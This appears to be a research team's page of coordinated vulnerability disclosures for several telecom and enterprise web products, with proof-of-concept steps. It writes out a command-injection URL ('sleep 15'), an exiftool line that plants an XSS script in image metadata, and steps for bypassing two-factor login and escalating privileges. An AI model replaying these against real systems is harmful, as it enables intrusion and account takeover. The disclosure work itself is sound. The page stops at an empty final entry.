URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/auth/login

Figure 1 - Payload

Click To Enlarge

In the following screenshot, a malformed JSON is submitted. The server responses with an error message containing absolute paths referring to the web application source code.

Figure 2 - Information Disclosure

Click To Enlarge

Security Impact

An attacker can gather information about the system to perform additional attacks.

CVE-2024-31843– Italtel Embrace

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - CWE-78

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31843

CVSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Federico Draghelli, Massimiliano Brolli

The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows authenticated users  to execute commands on the Operating System.

 

Step-by-step instructions and PoC

 

The application does not properly check the parameters sent as input before they are used to construct an OS command that will be executed on the operating system of the server. Due to the lack of validation of user input, an attacker is allowed to replace and inject arbitrary system commands with the privileges of the application user. This vulnerability is “blind”, meaning that the output of the command is not reflected in the server response.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/removeBackup/[REDACTED]/a;sleep%2015;/[ACCESS-TOKEN]/[REDACTED]/it

Payload used to exploit the vulnerability:

Figure 1: Payload

Click To Enlarge

Below is a screenshot of the vulnerable functionality. The first step is to request the deletion of a DB backup.

Figure 2: DB Backup management page

Click To Enlarge

In the generated request, it is possible to inject an OS command. In this case, the command was ‘sleep 15’. In the bottom-right corner of the screenshot, we can see that the server took 15 seconds to respond, meaning the command was executed successfully.

Figure 3: Remote Command Execution

Click To Enlarge

Security Impact

By exploiting the lack of validation mechanisms in the Web app, it was possible to execute arbitrary OS commands on the server.

CVE-2024-31842 – Italtel Embrace

Vulnerability Description: Use of GET Request Method With Sensitive Query Strings - CWE-598

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31842

CVSS: 8.8

Severity: High

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

 

The web application inserts the access token of an authenticated user inside GET requests.

Step-by-step instructions and PoC

The query string for the URL could be saved in the browser's history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources. If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks. Since the access token in sent in GET requests, this vulnerability could lead to complete account takeover.

Below are the evidences with the vulnerability details and the payloads used.

In the following screenshot there is an example of a GET request that contains the access token in the query string. This vulnerability is applicable to almost every functionality of the web application.

Figure 1 - Access token in query string

Click To Enlarge

Figure 2 - The access token is in the URL of the GET request

Click To Enlarge

Security Impact

An attacker that is able to read the token could access the web application as another user.

CVE-2024-31841 – Italtel Embrace

Vulnerability Description: Multiple Relative Path Traversal – CWE-23

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31841

CVSv3

Severity: 

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote unauthenticated attackers to read arbitrary files on the filesystem.

 

Step-by-step instructions and PoC

 

An unauthenticated user can read arbitrary files using multiple functionalities of the web application. An attacker can change the “filename” parameter in the POST request by adding sequences of ‘../’ in order to reference files outside the intended directory. Since the application does not check in which directory the file will be read, an attacker can access any file on the filesystem, including application source code, configuration files and so on.

 

Affected Endpoints

·       URL: https://[HOST]/[NODE-NAME/supervoip/api/v1/reportTraceBCCAS/buttonViewReportTraceBCCAS/[ANY-STRING]/[ANY-STRING]/it

·       URL: https://[HOST]/[NODE-NAME]/ supervoip/api/v1/logTrace/buttonViewLogTrace/[ANY-STRING]/[ANY-STRING]/it

·       URL: https://[HOST]/[NODE-NAME]/ supervoip/api/v1/reportTrace/buttonViewReportTrace/[ANY-STRING]/[ANY-STRING]/it

·       URL: https://[HOST]/[NODE-NAME]/ supervoip/api/v1/logTraceBCCAS/buttonViewLogTraceBCCAS/[ANY-STRING]/[ANY-STRING]/it

 

Below are the evidences with the vulnerability details and the payloads used.

Payload used to exploit the vulnerability:

Figure 1.1 - Payload

Click To Enlarge

Figure 1.2 - Relative Path Traversal

Click To Enlarge

Figure 2.1 - Payload

Click To Enlarge

Figure 2.2 – Relative Path Traversal

Click To Enlarge

Figure 3.1 - Payload

Click To Enlarge

Figure 3.2 – Relative Path Traversal

Click To Enlarge

Figure 4.1 - Payload

Click To Enlarge

Figure 4.2 – Relative Path Traversal

Click To Enlarge

Security Impact

By exploiting this vulnerability on the web portal, it was possible to read arbitrary files on the filesystem.

Remediation Steps

Implement strict validation for input parameters. Check that the path specified within the parameter is restricted only and exclusively to a dedicated directory.

 

CVE-2024-31840 – Italtel Embrace

Vulnerability Description: Insufficiently Protected Credentials - CWE-522

Software Version: 1.6.4

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-31840

CVSSv3: 6.5

Severity: Medium

Credits: Luca Carbone, Fabio Romano, Federico Draghelli, Massimiliano Brolli

The web application inserts plain passwords in the HTML source code.

 

Step-by-step instructions and PoC

An authenticated user is able to edit the configuration of the email server. Once the user access to the edit function, the web application fills the edit form with the current credentials for the email account, including the plain password.

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/supervoip/api/v1/getEmailServer/[ACCESS-TOKEN]/[REDACTED]/it

 

The page displays the plaintext password of the email address.

Figure 1 - Mail server configuration

Click To Enlarge

When you get to this page, the following request is sent to the server. The response contains the plaintext password of the email address.

Figure 2 - Payload               

Click To Enlarge

Figure 3 - The server responds with the plaintext password.

Click To Enlarge

Security Impact

By exploiting this vulnerability, it is possible for an attacker to read the password of the mail server.

CVE-2024-28806 – Italtel i-MCS NFV

Vulnerability Description: Absolute Path Traversal - CWE-36

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-28806

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

The web server fails to sanitize the input data allowing remote unauthenticated attackers to upload files on the filesystem in an arbitrary path.

 

Step-by-step instructions and PoC

An unauthenticated user can upload files in an arbitrary path using a specific functionality of the web application.  An attacker can change the “uploadDir” parameter in the POST request (not possible using the GUI) to an arbitrary directory. Since the application does not check in which directory the file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.

 

Below are the evidences with the vulnerability details and the payloads used. In this case, uploadDir was changed from /var/tmp/external/ to /tmp/

Payload used to exploit the vulnerability:

Security Impact

By exploiting this vulnerability on the web portal it was possible to upload files in an arbitrary path on the filesystem.

CVE-2024-28805 – Italtel i-MCS NFV

Vulnerability Description: Multiple Improper Access Control - CWE-284

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-28805

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

The web application does not restrict or incorrectly restricts access to a resource from an unauthorized actor.

 

Step-by-step instructions and PoC

Any user logged in the web application can view pages or use functionalities that are normally accessible only by specific roles. In some cases, these functionalities can be accessed even without authentication. This vulnerability can be exploited in order to gather critical information or in order to have unauthorized access to some functionalities.

Affected Endpoints

·       URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/advanced-settings.jsp

·       URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui /SaveFileUploader

 

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/advanced-settings.jsp

 

 

As an example, a user with the “Administrator” role can access the advanced settings page, which is normally available only to “System Administrator” users. This vulnerability can by exploited by simply inserting the appropriate endpoint in the URL. 

URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/SaveFileUploader

We can access the “Upload file” functionality in order to upload arbitrary files on the filesystem without authentication.

Security Impact

By exploiting this vulnerability on the web application it was possible to have unauthorized access to critical information and functionalities.

CVE-2024-28804 – Italtel i-MCS NFV

Vulnerability Description: Improper Neutralization of Input During Web Page

Generation (‘Stored Cross-site Scripting’) - CWE-79

Software Version: 12.1.0-20211215

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-28804

CVSSv3:

Severity:

Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli

Stored Cross-site scripting (XSS) vulnerability allows unauthenticated remote attackers to inject arbitrary web script or HTML into HTTP/POST parameter which store the user input without sanitization.

 

Step-by-step instructions and PoC

The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by stored type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed without authentication.

Affected Endpoints

·       URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui /j_security_check

o   HTTP POST Parameter: j_username

 

Below are the evidences with the vulnerability details and the payloads used.

URL: https://[HOST]/[NODE-NAME]/IMCSCI-WebGui/j_security_check

Payload used to exploit the vulnerability:

 

The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the malicious javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical since the attacker does not need any kind of access to the web application in order to exploit it.

Security Impact

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.

CVE-2024-25007 – Ericsson Network Manager

Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File (‘CSV Injection’) – CWE-1236

Software Version: < 23.1

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-25007

CVSv3: 7.1

Severity: High

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 23.1, contains a vulnerability in the export function of application log where Improper Neutralization of Formula Elements in a CSV File can lead to code execution or information disclosure. There is limited impact to integrity and availability. The attacker on the adjacent network with administration access can exploit the vulnerability.

CVE-2024-20906 – Oracle Integrated Lights Out Manager

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') - CWE-79

Software Version: 3, 4, 5

NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-20906

CVSv3: 4.8

Severity: Medium

Credits: Maurizio Gatti, Massimo Stifano, Massimiliano Brolli

 

Vulnerability in the Integrated Lights Out Manager (ILOM) product of Oracle Systems (component: System Management). Supported versions that are affected are 3, 4 and 5. Easily exploitable vulnerability allows high privileged attacker with network access via ICMP to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized read access to a subset of Integrated Lights Out Manager (ILOM) accessible data.

CVE-2023-7248 – OpenText Vertica Management Console

Vulnerability Description: Improper Input Validation – CWE-20

Software Version: 10.x, 11.1.1-24 or lower, 12.0.4-18 or lower

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-7248

CVSv3: 9.8

Severity: Critical

Credits: Gabriele Duchi, Davide Brian Di Campi, Tiziano Di Vincenzo, Massimiliano Brolli

Certain functionality in OpenText Vertica Management console might be prone to bypass via crafted requests.  The vulnerability would affect one of Vertica’s authentication functionalities by allowing specially crafted requests and sequences.

CVE-2023-50811 – Selesta Visual Access Manager

Vulnerability Description: Authorization Bypass Through User-Controlled Key – CWE-639

Software Version: 4.38.6

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-50811

CVSv3: 6.5

Severity: Medium

Credits: Cristina Coppola, Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Stefano Scipioni, Massimiliano Brolli

SELESTA Visual Access Manager 4.38.6 has Incorrect Access Control.

A remote user, authenticated as receptionist role to the web application “Visual Access Manager”, is able to modify the “computer” POST parameter related to the ID of a specific reception by POST HTTP request interception.

Iterating that parameter, it has been possible to access to the application and take control of many other receptions in addition the assigned one.

CVE-2023-49328 – Wolters Kluwer B.POINT

Vulnerability Description: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Software Version: 23.70.00

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-49328

CVSv3: 7.2

Severity: High

Credits: Lucas Gabriel Alves, Francesco Oriolo, Vanderlei Silva de Oliveira Junior, Alessandro Sabetta, Massimiliano Brolli

 

On a B.POINT server (on premises) running OS Linux, during the authentication phase, a validate system user was potentially able to carry out a “remote code execution (RCE)” attack by exploiting a vulnerability in a “server-to-server” communication module.

CVE-2023-39909 – Ericsson Network Manager (ENM)

Vulnerability Description: Improper Access Control – CWE-284

Software Version: 23.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-39909

CVSv3: 8.8

Severity: High

Credits: Massimiliano Ferraresi, Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 23.2, contains a vulnerability where Improper Access Control can lead to unauthenticated users with low privilege to access the NCM application.

CVE-2023-38328 – eGroupWare

Vulnerability Description: Plaintext Storage of a Password ('Improper Password Storage') – CWE-256

Software Version: 17.1.20190111

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-38328

CVSv34.9

Severity: Medium

Credits: Luca Di Giuseppe, Antonio Papa, Stefano Scipioni, Fabio Minarelli, Massimiliano Brolli

An issue was discovered in eGroupWare 17.1.20190111. An Improper Password Storage vulnerability affects the setup panel of under setup/manageheader.php, which allows authenticated remote attackers with administrator credentials to read a cleartext database password.

Step-by-step instructions and PoC

An authenticated admin user can read database credentials stored in cleartext in the eGroupWare setup panel.

Affected Endpoints

URL:
https://hostname/[REDACTED]/egroupware/setup/manageheader.php

https://hostname/[REDACTED]/egroupware/calendar/freebusy.php

Below are the evidences with the vulnerability details and the payload used.

Figure 7: Database credentials stored in cleartext in the eGroupWare setup panel

Figure 7: Database credentials stored in cleartext in the eGroupWare setup panel

Click to enlarge

 

Security Impact

By By exploiting this vulnerability, it is possible to access the web application’s data stored into the database.

CVE-2023-26071 – HarpaItalia Mcubo ICT

Vulnerability Description: Observable Response Discrepancy - CWE-204

Software Version: 10.12.4 6.0.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26071

CVSv3: 7.5

Severity: High

Credits: Marco Ventura, Massimiliano Brolli

An issue was discovered in MCUBO ICT through v.10.12.4 – 6.0.2. An Observable Response Discrepancy can occur under the login web page. In particular, the web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor. That allow an unauthorized actor to perform User Enumeration attacks.

CVE-2023-26062 – Nokia Web Element Manager

Vulnerability Description: Improper Access Control - CWE-284

Software Version: 21B

NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26062

CVSv3: 7.0

Severity: High

Credits: Massimiliano Ferraresi, Luca Borzacchiello, Massimiliano Brolli

A mobile network solution internal fault is found in Nokia Web Element Manager 21B. Exploit of this vulnerability is not possible from outside of mobile network solution architecture. This means that exploit is not possible from mobile network user UEs, from roaming networks, or from Internet. Exploit is possible only from CSP (Communication Service Provider) mobile network solution internal BTS management network.

 

Due to this vulnerability, the Nokia Web Element Manager allows an unprivileged user (must be logged in) to execute administrative function.

Step-by-step instructions and PoC

First Step create two users:

·       Nemuadmin (admin)

·       tespt (readonly)

The following evidence shows the read-only functionalities for testpt user:

Figure 1 read-only user

Click To Enlarge

 

With an http proxy is possible to intercept the response from login request by tespt and we

change the fields in the response from “profile”:”BTSRead” to “profile”:”Nemuadmin” and

“readOnlyAccess”: true to “readOnlyAccess”: false

Figure 2 request/response by testpt user (read only)

Click To Enlarge

Figure 3 Tampering the values in the response

 

Click To Enlarge

And the user testpt will have an access to administrative functions:

Like PoC with testpt (read-only user) we dump the S1 traffic from the BBU:

Figure 4 Dump traffic with testpt (read-only)

Click To Enlarge

Security Impact

By exploiting the this vulnerability an attacker can access admin’s functionality with a unprivileged user.

CVE-2022-47531 – Ericsson EPG

Vulnerability Description: Improper Privilege Management - CWE-269

Software Version: 3.18

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-47531

CVSv38.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

EPG / vEPG (3.x versions prior to 3.25 and 2.x versions prior to 2.16) contains a vulnerability where Missing Input Validation can lead to authenticated users to bypass system CLI and execute commands they are authorized to execute directly in the UNIX shell. This vulnerability if exploited can lead to limited loss of confidentiality and/or low impact to integrity and availability of the system.

CVE-2022-46408 – Ericsson Network Manager (ENM)

Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File– CWE-1236

Software Version: < 22.1

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46408

CVSv3: 6.8

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 22.1, contains a vulnerability in the application Network Connectivity Manager (NCM) where improper Neutralization of Formula Elements in a CSV File can lead to remote code execution or data leakage via maliciously injected hyperlinks. The attacker would need admin/elevated access to exploit the vulnerability.

CVE-2022-46407 – Ericsson Network Manager (ENM)

Vulnerability Description: Open Redirect – CWE-601

Software Version: < 22.2

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46407

CVSv3: 4.8

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

Ericsson Network Manager (ENM), versions prior to 22.2, contains a vulnerability in the REST endpoint “editprofile” where Open Redirect HTTP Header Injection can lead to redirection of the submitted request to domain out of control of ENM deployment. The attacker would need admin/elevated access to exploit the vulnerability

CVE-2022-45180 – LiveBox Collaboration vDesk

Vulnerability Description: Improper Access Control (Export of Users)- CWE-284

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45180

CVSv3: 6.5

Severity: Medium

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018.Broken Access Control exists under the /api/v1/vdesk_{DOMAIN]/export endpoint.A malicious user, authenticated to the product without any specific privilege, can use the API for exporting information about all users of the system (an operation intended to only be available to the system administrator).

Step-by-step instructions and PoC

A malicious user, authenticated to Collaboration vDesk without any specific privilege, can
use the API for exporting the information about all the users of the system.

Affected Endpoints

·       https://vdeskbridge.[HOSTNAME]/api/v1/vdesk_[DOMAIN] /export

Payload used by an attacker to create arbitrary guest users without authentication:

Figure 4 Detail of the request and response. In the response we can see (highlighted in yellow) the information of the users encoded in base64.

 

Click to Enlarge

 

Security Impact

This vulnerability would allow an attacker, authenticated as guest, to export the data of all
the users registered in the system.

CVE-2022-45179 – LiveBox Collaboration vDesk

Vulnerability Description: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) – CWE-80

Software Version: ≤v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45179

CVSv3: 5.4

Severity: Medium

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

Collaboration vDesk through vShare functionality section allow an authenticated attacker to store arbitrary HTML code in order to corrupt the web page (for example creating phishing sections to extrapolate the victims' credentials, etc..).

 

Step-by-step instructions and PoC

A remote user authenticated to Collaboration vDesk <=v18. can store arbitrary HTML code in the reminder section title. In our Proof-of-Concept, we created a phishing reminder to redirect the victim to an external domain (Open Redirect) or an internal domain affected by Cross Site Scripting.

 

Affected Endpoints

 

·       URL: https://vdeskbridge.[HOSTNAME]/api/v1/vdeskintegration/todo/createorupdate

o   HTTP GET Parameter: title

         https://vdesk.[HOSTNAME]/dashboard/reminders

Below is the evidence with details of the vulnerability and the payloads used.

Figure 1 – Payload used

Click To Enlarge

Figure 2 - Detail of the HTTP request/response showing the how the user "test1234" (read in the cookies) is creating on behalf of the user with ID "secictma2" the memo with the malicious HTML code present in the "title" parameter.

Click To Enlarge

Figure 3 -Reminder that secictma2 user finds himself in his HOME without his knowledge

Click To Enlarge

The victim user clicking on the "FATTO" button will initiate the execution of the malicious content present in the "title" field:

Figure 4 - The victim user, by clicking on the word written in "BLUE," as it refers to an href present in the <a> HTML tag, will initiate the Open Redirect to an external site and to the XSS present within vDesk

Click To Enlarge

Security Impact

An authenticated attacker can store arbitrary HTML code in order to corrupt the web page, for example by creating phishing sections to redirect victim users to redirect victim users to malicious sites or fill them with notifications or exploit other attacks within vDesk in addition to image damage.

CVE-2022-45178 – LiveBox Collaboration vDesk

Vulnerability Description: Improper Access Control- CWE-284

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45178

CVSv3: 8.8

Severity: High

Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. Broken Access Control exists under the /api/v1/vdeskintegration/saml/user/createorupdate endpoint, the /settings/guest-settings endpoint, the /settings/samlusers-settings endpoint, and the /settings/users-settings endpoint. A malicious user (already logged in as a SAML User) is able to achieve privilege escalation from a low-privilege user (FGM user) to an administrative user (GGU user), including the administrator, or create new users even without an admin role.

Step-by-step instructions and PoC

A malicious user already logged as SAML User is able to perform privilege Escalation from
FGM to GGU user, including the administrator, or create new users even with admin roles.

Affected Endpoints

·       https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/saml/user/createorupdate

·       https://vdesk.[REDACTED]/settings/guest-settings

·       https://vdesk.[REDACTED]/settings/samlusers-settings

·       https://vdesk.[REDACTED]/settings/users-settings

 

Below are the evidences with the vulnerability details and the payloads used:

Figure 5 Pair of HTTP requests and responses showing the role change from FGM to GGU

 

Click to Enlarge

 

Security Impact

A user authenticated with SAML is able to change his privileges by making his profile with
high privileges, even admin privileges in the system, causing privilege escalation.

CVE-2022-45177 – LiveBox Collaboration vDesk

Vulnerability Description: Observable Response Discrepancy – CWE-204

Software Version: ≤v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45177

CVSv3: 7.5

Severity: High

Credits: Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Ferraresi, Massimiliano Brolli

The Web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.

 

Step-by-step instructions and PoC

An attacker, without authentication, through Collaboration vDesk, is able to understand the state of the server and the users inside through the "User Enumeration" vulnerability.

 

Affected Endpoints

·       https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/user/isenableuser

·       https://vdeskbridge.[REDACTED]/api/v1/sharedsearch?search=[NAME]+[SURNAME]

·       https://vdesk.[REDACTED]/login

 

Below is the evidence with details of the vulnerability and the payloads used.

 

Payload used to exploit the vulnerability:

Figure 1 - Payload used to exploit the user enumeration vulnerability. By Iterating the username parameter, it is possible to verify, without any authentication, whether the user exists and can log in within the Collaboration vDesk system.

Click To Enlarge

Figure 2 - Pair of HTTP requests and responses showing how the user "secictma" exists

Click To Enlarge

Figure 3 - Figure demonstrating the existence of the user "secictma2"

Clik To Enlarge

Security Impact

A user can gain access to confidential information such as the presence of all users on the system by facilitating the password bruteforce phase or by exploiting other vulnerabilities such as "Multiple Broken Access Control".

CVE-2022-45176 – Livebox Collaboration vDesk

Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Stored Cross-site Scripting') - CWE-79

Software Version: <= v031

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45176

CVSSv3: 5.4

Severity: Medium

Credits: Massimiliano Ferraresi, Andrea Carlo Maria Dattola, Luca Borzacchiello, Massimiliano Brolli

Collaboration vDesk through vShare functionality section doesn't check properly the parameters, sent in HTTP requests as input, before saving them in the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.

 

Step-by-step instructions and PoC

 

A remote user, authenticated to the Collaboration vDesk web Page, through vShare functionality, can arbitrary upload a malicious file that contains an HTML code, more specifically javascript code inside HTML tags, and share this file to other victim users.

The Web application, in a specific endpoint, does not properly check the parameters into malicious file from clients before is re-included within the HTTP response returned by the application. Due to the lack of validation of user input, allows an attacker to inject arbitrary HTML code and the expected execution flow could be altered.

Affected Endpoints

URL: https://vdeskbridge.[HOSTNAME]/api/v1/getbodyfile

o HTTP GET Parameter: uri

Below are the evidences with the vulnerability details and the payloads used.

This first step consists to upload a malicious file into vShare section and share it with other victim’s users.

Figure 1 - possible malicious content to be placed in a file we call xssStored.html

Click To Enlarge

Figure 2 - Image showing the malicious .html file uploaded inside the application within the vShare section and shared with other users

Click To Enlarge

If the victim user opens the vulnerable endpoint the malicious code will be executed:

•           “https://vdeskbridge.[HOSTNAME]/api/v1/getbodyfile?uri=test/xssStored.html”

Figure 3 - HTTP Request and Response pair in which the call to the malicious file is shown

Click To Enlarge

Figure 4 - image showing the execution of xss in the browser context

Click To Enlarge

The attack is also exploitable via a malicious png image. Through the following command, a comment containing malicious javascript code is inserted into the metadata of the png file:

•           exiftool -Comment="><script>alert(1)</script>" currentavatar.png

Having made the upload of the png with modified metadata, the attacker can induce the victim to open the following endpoint and successfully carry out the attack:

•           https://vdeskbridge.[REDACTED]/api/v1/getbodyfile?uri=test/currentavatar.png

Figure 5 - HTTP Request and Response pair in which the call to the malicious png is shown

Click To Enlarge

Figure 6 - image showing the execution of xss in the browser context

Click To Enlarge

Security Impact

By exploiting this issue an attacker is able to target administrator users who are able to access the plugin configuration page within the browser with several type of direct or indirect impacts such as stealing cookies (if the HttpOnly flag is missing from the session cookies), modifying a web page, capturing clipboard contents, keylogging, port scanning, dynamic downloads and other attacks. This type of XSS does require user interaction.

CVE-2022-45175 – LiveBox Collaboration vDesk

Vulnerability Description: Insecure Direct Object Reference (Cached Files) – CWE-639

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45175

CVSv3: 6.5

Severity: Medium

Credits: Luca Borzacchiello, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. An Insecure Direct Object Reference can occur under the 5.6.5-3/doc/{ID-FILE]/c/{N]/{C]/websocket endpoint. A malicious unauthenticated user can access cached files in the OnlyOffice backend of other users by guessing the file ID of a target file.

 

Step-by-step instructions and PoC

A malicious user can fool vShare (through a WebSocket) to return a link to the OnlyOffice
cache of text files, even of other users.

The vulnerability can be exploited in the following way:

1.     the attacker opens a text file in his vShare, this will open a websocket towards vdeskoffice;

2.     the attacker looks at the history of websocket requests, and finds the one that asks for the cached file;

the attacker modifies the ID of its own file with the target one. The target ID could be obtained: (a) performing a brute-force attack (32-bit of entropy), (b) looking at the browser 1.     history of the victim, and looking for a link with the following shape: [...]/5.6.5-3/doc/[ID]/... where [ID] is the target file ID.

Payload used to exploit the vulnerability:

Figure 1 Websocket payload with a spoofed "docid" (in yellow). The destination websocket is opened by the attacker and has the following shape: vdeskoffice.[HOST]/5.6.5-3/doc/[ID-FILE]/c/[N]/[C]/websocket. Notice that [ID-FILE] is the ID of the file of the attacker, and its different from the one inserted in the body of the websocket.

 

Click to Enlarge

Figure 2 Websocket request and response. In the response (bottom right of the image) we can see the link to a file “Editor.bin”. The file is the target document in DOCY format, that can be downloaded by the attacker.The file contains the content of the target document encoded in UTF-16LE format. If the target file was a“.txt” file, we would have seen here a link to the file directly.

 

Click to Enlarge

 

Security Impact

Malicious users can access files in cache of other users if they guess the target OnlyOffice’s file ID.

CVE-2022-45174 – LiveBox Collaboration vDesk

Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication for SAML Users - Bad Backup Code Check)- CWE-287

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45174

CVSv3: 9.8

Severity: Critical

Credits: Antonella Marino, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication for SAML Users can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/challenge endpoint. The correctness of the TOTP is not checked properly, and can be bypassed by passing any string as the backup code.

Step-by-step instructions and PoC

The application allows a user to set a “Backup Code” to be used during the two-factor
authentication (instead of using the TOTP).
Unfortunately, for SAML users, the correctness of the TOTP is not checked correctly, and
can be bypassed passing any string as backup code.

The vulnerability can be exploited directly from the web-ui by:

1.     logging into the vDesk web application as SAML user;

2.     selecting the “backup code” option;

3.     inserting any string in the form.

Affected Endpoints

·       https://vdeskbridge.[HOSTNAME]/login/backup_code

·       https://vdeskbridge.[HOSTNAME]/api/v1/vdeskintegration/
challenge

 

Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:

Figure 7 Detail of the request and response. Notice how even if the server response fails, the

 

Click to Enlarge

 

Security Impact

By exploiting the lack of validation of the backup code on SAML users, the two-factor
authentication can by bypassed by an attacker

CVE-2022-45173 – LiveBox Collaboration vDesk

Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication - Lack of Server-Side Validation) - CWE-287

Software Version: <= v.018

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45173

CVSv3: 9.8

Severity: Critical

Credits: Massimiliano Ferraresi, Massimiliano Brolli

An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /api/v1/vdeskintegration/challenge endpoint. Because only the client-side verifies whether a check was successful, an attacker can modify the response, and fool the application into concluding that the TOTP was correct.

Step-by-step instructions and PoC

The web application implements two-factor authentication through a TOTP code. To check
whether the inserted TOTP is correct, the web-application implements the API
/api/v1/vdeskintegration/challenge. Unfortunately, only the client-side verifies
whether the check was successful, allowing an attacker to modify the response, and fool the
application that the TOTP was correct.

Affected Endpoints

·       https://[...]/api/v1/vdeskintegration/challenge

Below are the evidences with the vulnerability details and the payloads used

Figure 8 Detail of the request and the response before changing the response.

 

Click to Enlarge

The application responds with the following JSON, notifying that the check was not
successful:

{"status":"403","message":"OTP Check failed","totp":true}


The attacker, though, can modify the response, fooling the client-side code that the check
was correct:


{"status":200,"message":"OK","totp":true}

Figure 9 Response modified by the attacker

 

Click to Enlarge

Figure 10 Dashboard visualized just after the response modification.

 

Click to Enlarge

CVE-2022-45172 – LiveBox Collaboration vDesk

